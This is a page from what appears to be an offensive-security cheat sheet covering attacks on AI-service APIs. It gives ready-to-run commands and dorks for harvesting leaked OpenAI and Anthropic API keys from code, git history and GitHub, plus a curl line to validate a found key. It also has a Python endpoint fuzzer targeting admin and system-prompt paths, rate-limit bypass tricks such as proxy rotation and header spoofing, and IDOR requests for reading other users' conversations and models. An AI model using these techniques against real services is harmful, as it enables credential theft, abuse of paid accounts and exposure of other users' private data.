🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ€– OSAI Research / Find exposed API keys

API & Endpoint Attacks

API Key Enumeration & Abuse

# Find exposed API keys

# In JavaScript source
grep -r "sk-" *.js
grep -r "OPENAI_API_KEY" .
grep -r "anthropic" . --include="*.js" --include="*.ts"

# In git history
git log --all --oneline
git grep "sk-" $(git rev-list --all)
trufflehog git file://./repo --only-verified

# GitHub dorks
site:github.com "OPENAI_API_KEY" "sk-"
site:github.com "anthropic" "claude" "api_key"
site:github.com ".env" "sk-proj-"

# Validate found OpenAI key
curl https://api.openai.com/v1/models \
  -H "Authorization: Bearer sk-FOUND_KEY" | jq '.data[].id'

Model API Endpoint Fuzzing

import requests

base = "https://target.com"
headers = {"Authorization": "Bearer YOUR_TOKEN"}

# Common AI API paths to fuzz
endpoints = [
    "/api/chat", "/api/v1/chat", "/api/v2/chat",
    "/v1/messages", "/v1/completions", "/v1/chat/completions",
    "/api/generate", "/api/query", "/api/ai",
    "/api/llm", "/api/model", "/api/inference",
    "/api/prompt", "/api/ask", "/api/answer",
    "/api/admin/config",  # Admin endpoints
    "/api/system-prompt",  # Exposed system prompt
    "/api/models",          # Model listing
    "/api/embeddings",      # Embedding endpoint
    "/api/rag/query",       # RAG endpoint
    "/api/knowledge-base",  # KB management
]

for ep in endpoints:
    r = requests.get(base + ep, headers=headers, timeout=5)
    if r.status_code != 404:
        print(f"[+] {r.status_code} {ep} - {r.text[:100]}")

Rate Limit Bypass

# Rate limiting is often per-IP or per-token
# Bypass techniques:

# 1. Rotate IPs (proxies)
proxies = [{"http": f"http://proxy{i}:3128"} for i in range(10)]

# 2. Header manipulation
headers["X-Forwarded-For"] = "1.2.3.4"  # Some apps use this for rate limit key
headers["X-Real-IP"] = "1.2.3.5"

# 3. Different user agents
# 4. HTTP/2 multiplexing β€” send multiple requests in one connection
# 5. Long prompts instead of many short prompts (token-based bypass)
# 6. Use free tier endpoints vs paid tier
# 7. Websocket connections (if available) β€” often have different rate limits

IDOR in Multi-Tenant AI Systems

# Access other users' conversation histories
GET /api/conversations/CONVERSATION_ID
# Enumerate IDs: 1, 2, 3 or use UUIDs found elsewhere

# Access other users' knowledge bases
GET /api/knowledge-base/KB_ID/documents

# Access other users' fine-tuned models
POST /api/model/OTHER_USER_MODEL_ID/query

# Export conversation in another user's session
GET /api/export?session_id=OTHER_SESSION&format=json